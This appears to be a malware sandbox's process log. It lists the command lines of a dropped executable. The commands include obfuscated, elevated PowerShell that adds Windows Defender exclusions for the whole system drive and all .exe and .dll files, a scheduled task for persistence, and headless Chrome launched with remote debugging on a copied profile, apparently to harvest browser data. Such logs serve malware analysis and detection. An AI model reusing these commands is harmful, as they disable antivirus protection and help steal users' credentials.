11.exe "C:\Windows\Temp\11.exe"
2744powershell.exe powershell "Start-Process <#xkagfzgnanuo#> powershell <#xkagfzgnanuo#> -Verb <#xkagfzgnanuo#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
2236powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
1852schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "RegSvcs" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3012chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=34041 --headless --user-data-dir="C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" --profile-directory="Default"
604chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x90,0x94,0x98,0x8c,0x9c,0x7fef42df1e8,0x7fef42df1f8,0x7fef42df208
1404chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=812 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6
152chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\test22\AppData\Local\Temp --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod= --annotation=ver= --initial-client-data=0x154,0x158,0x15c,0x150,0x160,0x7fef3fc7218,0x7fef3fc7228,0x7fef3fc7238
2212